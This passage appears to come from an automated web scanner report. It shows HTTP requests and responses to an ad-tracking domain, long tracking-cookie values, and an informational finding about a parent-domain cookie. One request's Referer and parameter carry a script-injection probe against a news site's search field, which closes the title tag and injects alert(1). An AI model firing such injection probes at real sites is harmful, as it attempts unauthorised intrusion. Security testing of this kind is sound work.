rtc_YxMN=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; rsiPus_tUOz="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpirqV9WP6iKbjeS1EvCK92NbndG2piitFk5yhzPhnAIVVeI8wvPfEfGpMcyyi0ZXCuRAH+Wrd+7kBFP+ZXzTgAB9pial1F66Eth4yYkPBjhs5MGZEK2obbHJzXK/gFmoCokx9/Ao61PLnwjW1h/fOfQqTmendXjabL9mEjsmZ8h5LnWI3iTFcmRIcLdb3ZmBIa0+BVHNTmCbV8TASpuRNB5wNCKffxVCImQLsV4deo8+Akwef+V8iKqRR4ugdgQJopHeUym7bzQY6Pqh9ngw8/KK0UYuW+7cAUoqTK9monuYvcf9qCwhe16s3sLBj4nuQt3jpPaVvVE1CjGL+gsYCgvLYsVrDidhNA3biAPruncKDOOgDwPtq51BqMFGVJ15NVchWpIGX1nwY51g4fsDOibuMzKTe2I47yJ2oA0Q11FFtSsYAzaLnGsrHubVQyPuvH5oREoy9Vim2KKjt2EM6NQm+juzJAooId4TWM1TLGnU6NArnoNq7ZRkQH8CbB4/BOKwQctePWAlxVEDyT14uZ7Xcame3Vyfm9qOpIKeHi/FCMYZ9+e9iA1mOHJDSFjo/PrG6FMwicnWcbzRMdhyetWriJR4Iv3vVoTkaAvVjw3RPLJ7QbZy8RvCZLSK+Mb30f+zocCdaOU33zC3kB8OKwoG/sPOZp6D47HdxeMIGAH6A4EqPuypzL9IaWyMiABFAJkpO/J53v+VhIwjaX2Zx9HxyblPPlcYcHDoVz8ohHe1TFv4ZhojzCNU+SD50AA0xYHkvfBKhV8uNKkgcbT5XGELzGfp/u0nb61soeqykWpeKtOCck0uIeyFOqpTxJGcagvINt61Lcr9kTuH51qo9COwlD+12OQQpoG0HX7udhzGbti43BN6+U2jkTFJ8z/ccLbc5Q7AY1dP2ogyR8wN4TDrVCom3V7U+8tY60SVP5fyP/MSJsYW/SFDzxjTPw2T1xLrQUnf4bjFMZwLUYX0LGm6T8JzjLUX90Y+QhCCGx2O+pn1jqiafw1zGl1zojzSP55URVG4i72oJHzdpPrDeY3qKticMWTpre0tFT1pJhPK6co3PdrgpKSdNS6Fgu1yLIIISM27eIBfg5aGefSrXnl688BWkA4omwgRC39SniMzGkyDnk/qnhACz32o23N6geidHwaT44zCsHOMVxPlbbkjoK7MnPLOkmPqlM60X7+HgeSwnjQStxqzjoDcrOT4qm3xQ+X46QR0v2kcC6SpDoU0PKwqmKHHu98Kk5iynCM4EwCCyDQSpw92HNKxpMkGJuz8nqJEyEuZhgkxA8HwDajv2I3adO4NXflA=="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEmx5IO512gB9+vbl6byANFyTJhbu9vWtzAhzzNfE+pD3lAuHGHVp514nWGQnCu6brt5PUxGRUlQamUvZIBZOhHhqaWIknb5L5bfPjNdHiOI3+L71fEzWoRn+y4+5eRBTByQ7gkvqh/99HNVJg0Mhx7jT93632OtMFe7leendZZd8NDEWPbpffS+GCpH6QqL3BsceChO/XL4EGbINYl9Qi2qEn7l9NZaOmvg0qDTl+Y3fcKZnj7j4dAOCEcp3VCJy7MrJuCzgShhc8m3KBbg8qQ3AF3lCiMjM3k548QswmYutAebkL8RIEAXL6kMQguxVmt59rl8bUbMEHiltuhakDds27H2600AqNtHEy2USw5vN72PbvgEu9DVOf5eUMeAt5PAiNvd5Upl10qqyVnAb6OF2cXaIyT/PwUXcdq4d7o22XeQxkVHmdYIr3tH092wXrqVICF6LzxpwGsmT/WvH/a3vASqFEOUT52i2tfn6fncA3Lnf3DDNMmYX+MeEf0Og5DUItZXD61CdeBCI2cjGBrJTBJyT3nreFca+VR5Z3HjjKhWFLqVYSbsn0ZYVB7LNEmgyiPfhzdRR6bWkjNJwozmOc3fvrkNw9CNiVcGJUkIlGc1WvKXDXnga6xk/e0i4q8tMzUn4T+rbQ83v/SYy/xbh8sP0ximayS9XZWO5+CluJkUk85bZMbCuB+Ik/KbBF4aqZQ4ZvHoJq4zTxglm2ewijhKHhzErTPi0iMmBv4Ht8FJhCENtmChEiqxhdiDDP1SeW8h3eEPIBXDCs/wHf/xSMiEJwAP2Y98pc7DHfosuzCREAzM3TYioHSfNZFpQLwpvqLLAHKFDUakZ3P93Zp7WEmE9V6tD6Pup8UJryE1CORWQiB9Rst+H4Ve8ib/zR3GE7riSAwx/nmNBX+TympwelaDVPoCe5vP/0UpciqM2r2WdO0yZt9U7mCaVOj9vjofyg7KjB3JJ3a7QQ2+ItWxXxOvADytVwDRCaETLlfSXZRF8MTvb5toU0JrcfZK1avEeIy22iiKkgzYJ83IX1u99j0PmDe5IcWhX/WJm+tmxN/jF1vtCGUsz7Ai8vI5sbEVacmLZpP79tRqj7KRRbHt5bmt3pD9paJ/NU9dcGdrTUaDb6l1J5kXlaDa2xqyd4PhGmVI4we2yrYj5+mAE4p1Jo1NGDYAjOJ0JkgrWadPfMo0SApCKvMtaamxL1k1UhtKWjZ60BKyKYNxKzUSHpfsKvamEvP7t7VkdnDkFOoyET7+JpbrRHk9msl09UtXT0O2laq7+git06IJ6Zj2lTGE3P5BjBAOAYNoyFhyjb4g5rGv0KC/6nOmFnflH6QXTLRmCFX2YuzoEsnzjB/NXATTx0UzdFwa0s2juTD+nN8P2TuK6EJsMEbCo01RjWNaFUCiVIvbFUvZn+t7y3VCPlzeQjF4Gg7rVqNbo5hNH01RdxeyHXnnjJRMHftUilaps7Lfez4NizQRUzJyASf9Ra4CFDTBdqxuOSCVllk7hNyoMQto2gzD6W2SZW5dBu+nl5rExn6GPq1qc/ZnHfGIQT5/4U5V5GALQUO6kY449jCR1RYBLRUWZEqHnVuC76FSeOev6d4RB1/P0aG8R7rBtEcWQPh4xF63/uOOBGg3HfECsCxY8rf+6u9c5CFJgec55csxOba57LBeSCBAGPtMkOGkL8HtxzA8iQ0F6NXNvKN2IkmsaLRGrY/9SRz0MaaK4NnRz+xhipVvXBkQJw=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLhTbolAkDk1UfKsz1kYeEvzzAbQ1S6XsD6gHXyGPXQeWeGn3x9W4NDIkuCZzfuQ1VVG5sVtQXpfs93UPetTR+3zqbfhVyQhkuGz19zcg4YMGL4ewrib0GrKI2iHUVJMOl3syAixj4Kcld+V5pabM30MBjSgAX3i2SGLND7CvNIg3u0dauAuW+f0Paxc8868s3FpcNWiLCArLSSP8xIkd03RoFQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OcxNyVGoDIbkhMYAlEzdn2gzAYqpNfvJZa/Jo670TbHku9uay0K7xnjpTzbSDrr0/WaMF3qDSd89+72HHwqxqPEGogh1DYXPxyCfsv2Fv4yo/VamCu60gdfrSpkkxxC6jnwnPe560IjBTYADgDOwotNJqmCgZH7pSGzXThqOqRSA06vyDyeimVsjl1voXGfKX74a/GPXY7/qOB6t1KMEqP4WwwDehYTwm2b8vNtOMqkvctcKGDDkKKB0UdJtcN0mSr75VwAK0XUY3vaRhdsaYshJs6UhVJLK/Val2KyEDmB+L2lp9JqHsvRLqgLOl5XDKKRLQc/UBmorHEc/TIHBJNS1mg130iTqUH4VheUU+7XmFCi7owUI1/JSNLf3zVlP93r+tmLtsYrZSu4oloPzFDWLZakEAK9m0inSch7wHhKP2jDUlKH25wqHet39UNQmd+V5pabMBUMBnSgPn8qcRoMKbm4MH0u9ddDZ35h8C7g7+ztf1TvTm7N6yq2hVkZ7u74bje6nd1VoGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:22:25 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:22:25 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.180. http://pix04.revsci.net/I10985/b3/0/3/1008211/700812667.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/700812667.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JSW8locAzObnhu4IU3vheM3NskvAjloepK61+AvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1yGXKzaXaBtH5FPnD6taOU3kVsstlxUvHpxx6jjOYyhPvK7n93Kw1M0xFI9oCqQrDls54EVd2af/P+mr4aIUPtDx67xLmPpSli0jZnVB+zAH/bUTVGVQ3bV/3ZM6XBUrfzgcgkl2NqBfNMacOQA1RtyEdAjscD9S6p+JJrsiYejEsVMa5Gcu58i5u9wMWeriE1+VRrP9GWoISVWsDPdvokl9gbLDdDdyEpZEzMU8TTcyDl4MTQ96wnq89UFYUu1exqd5bvfKOgd/ZS5VS4ASCQ/Bwq3Y6odsBcs1r0dH9Bdd7XFzvxy8buM3hyPhb38UyCaoMKH2FbmG7qbETfJ+iUcStl07WmLBcrwkxFT74l1sh7H1RXN2o49jramPHPxstlTbUbQ5HErONzX7Ba/SBBXPx1ncISsuK0TnDSB0/jUoLnAdvWGvSb7qIXU95z+1R9Olfwa/tX7EcaLWgFrOmy6Xv8IGQvUjgEzB0GqapaOF4PjMZ33qklQpoN3TigM4azUpRY5SR6o4ubpSwkMCV41n0BMVeEWjeG8UfMo8LjmHBA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:07:27 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/700812667.js?D=DM_LOC%3Dhttp%253A%252F%252Fsearch.cnbc.com%252Fmain.do%253Ftarget%253Dall%2526keywords%253Dxss36c5e%25253C%252Ftitle%25253E%25253Cscript%25253Ealert(1)%25253C%252Fscript%25253E2789f6ff334a89918%2526categories%253Dexclude%2526searchboxinput%253Dxss%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F4%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss36c5e%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E2789f6ff334a89918&categories=exclude&searchboxinput=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rtc_622X=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; rsiPus_vvhk="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M/kolpihGBj4llhxoQ3e3VA0m2LzBcz+ue/irdpq0puezRQyGE/19AVaWSIMLvpTFv9DuubBt8HnJrcZLqq2sSwsQJOUcj2UGm8VSkIxV9xfIE781mcvTCJUd7Cx7EaVhHbsTrcHcsRzKV/qhTkTXFWyIcnN/eemZToJPiSVyzOuDOv03fp7CS3/47yM2+2QMg20rczlu7hNYOjZOY2UWz65oLTaP+TBHgV+nk4mUsjLfTxGnZjv783o4BzL1ZFSM9YsNK022R1zWs+v8bMEcZ42tQMNxTy+2paVd70M6zZ/pDvz49eQcjuNbnF9rcSOabflWXvtxUIfRWanDMmO1yjsYCAXLYsFrGidhNE3biAvrrHcKDONQDwPtq51BqMFGXJ2K1JchWpIGU1mg45FgkfsDPCbuMzSTe2I/LyJ2oA1Q11FFtSsYATaLnGkrHubVQwvujHJoREoy9Vi22KKjl2ENGxUm+jujdAovId4TXM1TLGFW+TU4EtQQ0pk/9WyI4uxTJXwchZjWBbuVRyOUsep62COmbUE6xaucVujijxwsEg1X/25XxoalbwvOiZxWB09wK/CQeW0mSCfnZVq8I+G9sPHQCV+JDOmLHsbZr+ZxxI+LePYQrysaP1GH14+kHdo/H7U2Ev+x/Lq/EPP3dnVNRTwCnC1YEvRuE6L94lN0nIjuQadceXBVQDwUlegLanaWP7z1LfYU+rS2u62/9ZEdET6idOD8im7C0ry9XUXJWm5u5aFFmINi0cnISEtZayepMCn2N/25kesrWTNmsegXbiB7SeFoe5uy97GTsZMcjfcDn3nYBJJzhk9AHY8ITLQhrSM99Ni/O9q9Kea4RqMReNDsXgHUiSMoXE+8GmuVPJdC+22JOCg60xfxoInLnb4pLS8BGXnH+R/nwEC8fnsxmCYoyOsDQuwKc5mX/4UzdSXPU8QZD22dUjczysauMwd3mlMrw+gt9K3vAzDx7QExeBzuIh4EBi0jRlxicwOnCJ2O1dI1/gai49yN7WgIGfbhLWZmb29AqkTRonUqKwaLe6yFWCWd2+kMvXlCUEX5pW0s7YtJsmBvzTQKq9zWArWbBLZ6uq+eIKwbrwUYVbGflCu/4ggnOnhm1oCkX4ZR09MiA4s4DmjY+WAY+svtpp4ah0Jy49yJFnJ6u9cL7JsfxYq8bXLtLhxRoACUOsP4bY+4VCqsMQsTfUKB33044PgqSUSAWQt5ngnfYTax4EPvusuDw1LISqQulofQA6gBN/ZmpwPm1stzYk+lmkw3NbXYQFos8M8le4yHxU6n7I0pRPKbe430fO7Zc9"; 